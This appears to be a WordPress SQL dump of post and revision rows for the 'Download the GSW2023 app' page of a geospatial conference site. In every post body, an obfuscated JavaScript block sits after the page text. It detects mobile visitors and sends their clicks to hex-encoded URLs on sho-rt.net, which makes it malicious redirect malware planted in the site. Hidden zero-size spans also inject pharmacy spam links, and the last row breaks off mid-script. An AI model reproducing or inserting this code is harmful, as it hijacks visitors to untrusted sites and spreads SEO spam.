(5417,1,'2023-08-26 21:28:12','2023-08-26 21:28:12','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<button onclick=\"window.location.href=\'https://conference4me.psnc.pl/download/\';\">\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx47x4fx78x32x63x332\',\'length\',\'_blank\',\'mobileCheck\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx64x44x6cx33x63x343\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6bx41x6fx30x63x330\',\'random\',\'-local-storage\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx6fx56x75x37x63x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx61x68x44x36x63x356\',\'12075252qhSFyR\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx5ax50x66x38x63x378\',\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx51x69x43x35x63x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx43x57x74x31x63x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx57x73x55x34x63x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'x68x74x74x70x3ax2fx2fx73x68x6fx2dx72x74x2ex6ex65x74x2fx53x4ex4bx39x63x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-[a-w])|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|n<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.goocialis.cc/\">犀利士</a>\n</span>ok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-([1-8]|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-[2-7]|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.viagraseo.com/\">威而鋼</a>\n</span>x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x<span style=\"font-size:0px; color:#ff0000;\">﻿<a href=\"https://www.cialisloc.com/\">犀利士</a>\n</span>365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','publish','closed','closed','','download-the-gsw2023-app','','\nhttps://conference4me.psnc.pl/download/','2023-10-03 13:30:00','2023-10-03 13:30:00','',0,'https://gsw2023.com/?p=5417',0,'post','',0),
(5420,1,'2023-08-26 21:22:43','2023-08-26 21:22:43','','QR-code-nposter2_Siavash_14May19-726x1024','','inherit','open','closed','','qr-code-nposter2_siavash_14may19-726x1024','','','2023-08-26 21:22:43','2023-08-26 21:22:43','',5417,'https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg',0,'attachment','image/jpeg',0),
(5421,1,'2023-08-26 21:28:12','2023-08-26 21:28:12','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You can download the app with the programme and many other useful information on the Conf4me website.\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-08-26 21:28:12','2023-08-26 21:28:12','',5417,'https://gsw2023.com/?p=5421',0,'revision','',0),
(5423,1,'2023-08-26 21:30:34','2023-08-26 21:30:34','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You can download the app with the programme and many other useful information on the Conf4me website.\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const 